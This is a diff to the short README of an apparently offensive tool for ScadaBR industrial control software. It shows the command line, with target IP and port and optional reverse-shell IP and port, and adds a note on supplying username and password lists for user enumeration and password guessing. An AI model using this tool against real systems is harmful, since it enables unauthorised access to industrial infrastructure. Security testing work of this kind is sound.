DeathRipper21/ScadaBRExplorer/README.md

 <p>
 python3 scadabrute.py --ip ip --port port --revip (reverse_shell ip) --revport (reverse_shell port) <br>
 Last two are optional, in case you don't care about it! <br>
+Please create a usernames.txt file and passwords.txt file in order to use the user enumeration and password guessing functions! <br>
 </p>